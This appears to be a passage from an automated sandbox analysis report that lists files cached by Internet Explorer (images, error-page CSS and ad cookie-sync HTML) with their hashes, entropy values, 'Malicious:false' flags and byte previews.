                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19135
                                                                                                                                                                                                                                  Entropy (8bit):7.696449301996147
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:IHtFIzAsGkT2tP9ah048vTWjczBRfCghSyOaWLxyAy3FN5GU643lb1y6N0:INFIFTsEG46SjcbmaWLsR3FNY/Ayz
                                                                                                                                                                                                                                  MD5:01269B6BB16F7D4753894C9DC4E35D8C
                                                                                                                                                                                                                                  SHA1:B3EBFE430E1BBC0C951F6B7FB5662FEB69F53DEE
                                                                                                                                                                                                                                  SHA-256:D3E92DB7FBE8DF1B9EA32892AD81853065AD2A68C80C50FB335363A5F24D227D
                                                                                                                                                                                                                                  SHA-512:0AF92FBC8D3E06C3F82C6BA1DE0652706CA977ED10EEB664AE49DD4ADA3063119D194146F2B6D643F633D48AE7A841A14751F56CC41755B813B9C4A33B82E45C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..h.h........(.h........(.h......Z.(........(.h........TNY...W....q@..~..<..h.....dG.@.........F....L.@%}.....-K.F.9...c..O.7X9u,%.k.4..4..c.<p"...cp.-...U.J.n2..9.b.d.SphR.\V.5Q-./.LV.6...HM.V.d^E...F.q.*+7..a.m..VOA..qR.X.rx5&.(..Q..P.R..x..WM-.?........V..GTi.(.(........(........J.(.(......J.(........Z.(........Z.(........Z.(........(.h.......i..H.@...;..Y...q...0.<e+.B...[.v..
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB1aXBV1[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1161
                                                                                                                                                                                                                                  Entropy (8bit):7.80841974432226
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:zxxmempCXfPZq+DLeP1cRwZFIjvh3wuiFZMrFYzWkG4iD3w:zxRBXfB9k1cRuFIbJWsFYT/2w
                                                                                                                                                                                                                                  MD5:D858BE67BEA11BF5CEC1B2A6C1C1F395
                                                                                                                                                                                                                                  SHA1:6090B195BEF6AF1157654048EECEA81E2DCEC42A
                                                                                                                                                                                                                                  SHA-256:FC7CF2E8592C8E63CFF72530DA560E3293EC2DE3732823DBAEB4464609EA0494
                                                                                                                                                                                                                                  SHA-512:180FA05957A2FCF8192006D5F8E8D3E4DE1D79DD6F9F100D254C513068FC291B3086DE9A8897B3658D83FE3335FDEB4023F13AC3A6A8A507729AE22B621EC7D7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................U....pHYs..........+.....;IDATx...}..c.....j...2..Y.l....i.<4.c...)..p...M..(4b.Z.r...."cDe..Bz..sw.g.9.....^..u}?....n[he.{..,u.....`.>.[.iE...[.1B.Tx..X.7......0.[.....5.)p...x...d\...g..........WmE1.sl......u....3K.[......;...........f....W(.E3//6...2tG..AU...`7f.m. r;..r..{.~.X./.Q._..`.C...D.M.n.p%..U...0...HTe..1......7.@.Tn.r......C.k.../[..j.X..:.+Q.3.y.4. ,E....g.Y...p^..c..:..#/...iES....E.w..op.... .9.W........).+.1....A~.\...{...q.El..`.&;...o.&q:.K....|.....e.(..."9.z\.~.....G.h...\.'.;... G........J....P.gy..<BeK.I..<..d..MF".O.uE...R..-...{..J...F..*.a..lj...t\.W.....&.l|?...WvP...._o.c.....8..10;.q-"8L.2..~,....~V..|]..c..\.'...I.....u8.......Q.3..lB."..!LD.bs.K[..)0P0.9..'....K...W..g..,f.........S......S..)N..D;.....<.....7#..X2.ws.....H.vF'...,$l..R4.O/.~..j.'&..6.........!.D.m..].G........W#.Uir..sT..m....h...UN.._V#..S.6.....i..M....[..?.J.....OL\..Q<{.G.n5).Ix.....<+7Ey.....W.].NR.o...._.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB1cG73h[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1131
                                                                                                                                                                                                                                  Entropy (8bit):7.767634475904567
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:lGH0pUewXx5mbpLxMkes8rZDN+HFlCwUntvB:JCY9xr4rZDEFC
                                                                                                                                                                                                                                  MD5:D1495662336B0F1575134D32AF5D670A
                                                                                                                                                                                                                                  SHA1:EF841C80BB68056D4EF872C3815B33F147CA31A8
                                                                                                                                                                                                                                  SHA-256:8AD6ADB61B38AFF497F2EEB25D22DB30F25DE67D97A61DC6B050BB40A09ACD76
                                                                                                                                                                                                                                  SHA-512:964EE15CDC096A75B03F04E532F3AA5DCBCB622DE5E4B7E765FB4DE58FF93F12C1B49A647DA945B38A647233256F90FB71E699F65EE289C8B5857A73A7E6AAC6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................U....pHYs..........+......IDATx..U=l.E.~3;w{..#].Dg!.SD...p...E....PEJ.......B4.RE. :h..B.0.-$.D"Q 8.(.;.r.{3...d...G......7o..9....vQ.+...Q......."!#I......x|...\...& .T6..~......Mr.d.....K..&..}.m.c.....`.`....AAA..,.F.?.v..Zk;...G...r7!..z......^K...z.........y...._..E..S....!$...0...u.-.Yp...@;;;%BQa.j..A.<)..k..N.....9.?..]t.Y.`....o....[.~~..u.sX.L..tN..m1...u...........Ic....,7..(..&...t.Ka.]..,.T..g.."...W......q....:+t.?6....A..}...3h.BM/.....*..<.~..A.`m...:.....H...7.....{.....$... AL..^-...?5FA7'q..8jue...*.....?A...v..0...aS.*:.0.%.%"......[.=a......X..j..<725.C..@.\. ..`.._....'...=....+.Sz.{......JK.A...C|{.|r.$.=Y.#5.K6.!........d.G...{......$.-D*.z..{...@.!d.e...&..o...$Y...v.1.....w..(U...iyWg.$...\>..].N...L.n=.[.....QeVe..&h...`;=.w.e9..}a=.......(.A&..#.jM~4.1.sH.%...h...Z2".........RP....&.3................a..&.I...y.m...XJK..'...a......!.d.......Tf.yLo8.+.+...KcZ.....|K..T....vd....cH.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB1ftEY0[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):497
                                                                                                                                                                                                                                  Entropy (8bit):7.316910976448212
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7YEtTvpTjO7q/cW7Xt3T4kL+JxK0ew3Jw61:rEtTRTj/XtjNSJMkJw61
                                                                                                                                                                                                                                  MD5:7FBE5C45678D25895F86E36149E83534
                                                                                                                                                                                                                                  SHA1:173D85747B8724B1C78ABB8223542C2D741F77A9
                                                                                                                                                                                                                                  SHA-256:9E32BF7E8805F283D02E5976C2894072AC37687E3C7090552529C9F8EF4DB7C6
                                                                                                                                                                                                                                  SHA-512:E9DE94C6F18C3E013AB0FF1D3FF318F4111BAF2F4B6645F1E90E5433689B9AE522AE3A899975EAA0AECA14A7D042F6DF1A265BA8BC4B7F73847B585E3C12C262
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx....N.A..=.....bC...RR..`'......v.{:.^..... ."1.2....P..p.....nA......o.....1...N4.9.>..8....g.,...|."...nL.#..vQ.......C.D8.D.0*.DR)....kl..|.......m...T..=.tz...E..y..... ..S.i>O.x.l4p~w......{...U..S....w<.;.A3...R*..F..S1..j..%...1.|.3.mG..... f+.,x....5.e..]lz..*.).1W..Y(..L`.J...xx.y{.*.\. ...L..D..\N........g..W...}w:.......@].j._$.LB.U..w'..S......R..:.^..[\.^@....j...t...?..<.............M..r..h....IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BB7hjL[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):462
                                                                                                                                                                                                                                  Entropy (8bit):7.383043820684393
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7FMgL0KPV1ALxcVgmgMEBXu/+vVIIMhZkdjWu+7cW1T4:kMgoyocsOmIZIl+7cW1T4
                                                                                                                                                                                                                                  MD5:F810C713C84F79DBB3D6E12EDBCD1A32
                                                                                                                                                                                                                                  SHA1:09B30AB856BFFDB6AABE09072AEF1F6663BA4B86
                                                                                                                                                                                                                                  SHA-256:6E3B6C6646587CC2338801B3E3512F0C293DFF2F9540181A02C6A5C3FE1525A2
                                                                                                                                                                                                                                  SHA-512:236A88BD05EAF210F0B61F2684C08651529C47AA7DCBCD3575B067BEDCA1FBEE72E260441B4EAD45ABE32354167F98521601EA21DDF014FF09113EC4C0D9D798
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx...N.P...C.l...)...Mcb*qaC/..]..7..l...x.Z......w......._....<....|.........."FX.3.v.A.............1..Rt...}......;....BT.....(X.....(....4...-...f....0.8...|A.:P%.P..if.t..P..T.6..)s..H..~.C..(.7.s>....~...h..bz...Z.....D4Vm.T...2.5.U.P....q.6..1t~.ZU....7.i...".b.i.~...G.A!..&..+S.(<(...y._w..q........Q.l..1...Tz...Q...r.............g...+.o.]...J...$.8:.F..I.......XT..k.v....IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BBY7ARN[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):779
                                                                                                                                                                                                                                  Entropy (8bit):7.670456272038463
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:dYsfeTaIfpVFdpxXMyN2fFIKdko2boYfm:Jf5ILpCyN29lC5boD
                                                                                                                                                                                                                                  MD5:30801A14BDC1842F543DA129067EA9D8
                                                                                                                                                                                                                                  SHA1:1900A9E6E1FA79FE3DF5EC8B77A6A24BD9F5FD7F
                                                                                                                                                                                                                                  SHA-256:70BB586490198437FFE06C1F44700A2171290B4D2F2F5B6F3E5037EAEBC968A4
                                                                                                                                                                                                                                  SHA-512:8B146404DE0C8E08796C4A6C46DF8315F7335BC896AF11EE30ABFB080E564ED354D0B70AEDE7AF793A2684A319197A472F05A44E2B5C892F117B40F3AF938617
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx.eSMHTQ...7.o.8#3.0....M.BPJDi..*.E..h.A...6..0.Z$..i.A...B....H0*.rl..F.y:?...9O..^......=.J..h..M]f>.I...d...V.D..@....T..5`......@..PK.t6....#,.....o&.U*.lJ @...4S.J$..&......%v.B.w.Fc......'B...7...B..0..#z..J..>r.F.Ch..(.U&.\..O.s+..,]Z..w..s.>.I_.......U$D..CP.<....].\w..4..~...Q....._...h...L......X.{i... {..&.w.:.....$.W.....W..."..S.pu..').=2.C#X..D.........}.$..H.F}.f...8...s..:.....2..S.LL..'&.g.....j.#....oH..EhG'...`.p..Ei...D...T.fP.m3.CwD).q.........x....?..+..2....wPyW...j........$..1........!W*u*e"..Q.N#.q..kg...%`w.-.o..z..CO.k.....&..g..@{..k.J._...)X..4)x...ra.#....i._1...f..j...2..&.J.^. .@$.`0N.t.......D.....iL...d/.|Or.L._...;a..Y.]i.._J....IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\BBkwUr[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):436
                                                                                                                                                                                                                                  Entropy (8bit):7.255906495097201
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:6v/lhPahm/BBjoPHhOVDqpp05cMxyHtGUmmozY7JE3R+hRMCzRPasXQc01UaVesl:6v/7MHQg25b8Ht3VEMNQ2w5
                                                                                                                                                                                                                                  MD5:01B5E74F991A886215461BF0057008C7
                                                                                                                                                                                                                                  SHA1:6A7347C3559814722D7AA4D491A0D754E157FCC5
                                                                                                                                                                                                                                  SHA-256:DB8A0C0A44AEE824F689A942D99802F95D7950758CB0739C7F179624A592CD51
                                                                                                                                                                                                                                  SHA-512:17820A7C90B35B0E45D0A07F5445D8C97BFD3098FD9E0F0283CD6CFC1DB2B33C651924D2F04EF398C147CEB8D7DEA3F591DBC19F9039279407C4E4231AC5F5B7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+.....fIDATx.}..M.@.......0...Aa.......#0..."..0....a....<....<....y..qS......m..k..%.'|.......`....Z.`x...X............Np..x........a%(..ab........=.....j.[....0}.>.O..R~..<@y....nV..:.q.....G.P.e..............?s....i^l.P..5.0....?...&.A.K..|+...X.h)....5K...Zx...[....G...0N<.~PC.@.X.O2..N..x...:?..7.xH.&.......C3..8....Q.*.>...W..~..].U..U>L/....Le&.......IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\NewErrorPageTemplate[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1612
                                                                                                                                                                                                                                  Entropy (8bit):4.869554560514657
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                                                                                                                                                                                                  MD5:DFEABDE84792228093A5A270352395B6
                                                                                                                                                                                                                                  SHA1:E41258C9576721025926326F76063C2305586F76
                                                                                                                                                                                                                                  SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                                                                                                                                                                                                  SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\a5ea21[1].ico
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):758
                                                                                                                                                                                                                                  Entropy (8bit):7.432323547387593
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
                                                                                                                                                                                                                                  MD5:84CC977D0EB148166481B01D8418E375
                                                                                                                                                                                                                                  SHA1:00E2461BCD67D7BA511DB230415000AEFBD30D2D
                                                                                                                                                                                                                                  SHA-256:BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
                                                                                                                                                                                                                                  SHA-512:F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\aMt[1].avi
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5
                                                                                                                                                                                                                                  Entropy (8bit):2.321928094887362
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:3:3
                                                                                                                                                                                                                                  MD5:5BFA51F3A417B98E7443ECA90FC94703
                                                                                                                                                                                                                                  SHA1:8C015D80B8A23F780BDD215DC842B0F5551F63BD
                                                                                                                                                                                                                                  SHA-256:BEBE2853A3485D1C2E5C5BE4249183E0DDAFF9F87DE71652371700A89D937128
                                                                                                                                                                                                                                  SHA-512:4CD03686254BB28754CBAA635AE1264723E2BE80CE1DD0F78D1AB7AEE72232F5B285F79E488E9C5C49FF343015BD07BB8433D6CEE08AE3CEA8C317303E3AC399
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: 0....
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\checksync[3].htm
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21628
                                                                                                                                                                                                                                  Entropy (8bit):5.304819777739522
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                                                                                                                                                                                                                  MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                                                                                                                                                                                                                  SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                                                                                                                                                                                                                  SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                                                                                                                                                                                                                  SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":80,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\checksync[4].htm
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21628
                                                                                                                                                                                                                                  Entropy (8bit):5.304819777739522
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                                                                                                                                                                                                                  MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                                                                                                                                                                                                                  SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                                                                                                                                                                                                                  SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                                                                                                                                                                                                                  SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":80,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\checksync[5].htm
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21628
                                                                                                                                                                                                                                  Entropy (8bit):5.304819777739522
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                                                                                                                                                                                                                  MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                                                                                                                                                                                                                  SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                                                                                                                                                                                                                  SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                                                                                                                                                                                                                  SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":80,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\de-ch[2].json
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):79097
                                                                                                                                                                                                                                  Entropy (8bit):5.337866393801766
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCgP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlDxHga7B
                                                                                                                                                                                                                                  MD5:408DDD452219F77E388108945DE7D0FE
                                                                                                                                                                                                                                  SHA1:C34BAE1E2EBD5867CB735A5C9573E08C4787E8E7
                                                                                                                                                                                                                                  SHA-256:197C124AD4B7DD42D6628B9BEFD54226CCDCD631ECFAEE6FB857195835F3B385
                                                                                                                                                                                                                                  SHA-512:17B4CF649A4EAE86A6A38ABA535CAF0AEFB318D06765729053FDE4CD2EFEE7C13097286D0B8595435D0EB62EF09182A9A10CFEE2E71B72B74A6566A2697EAB1B
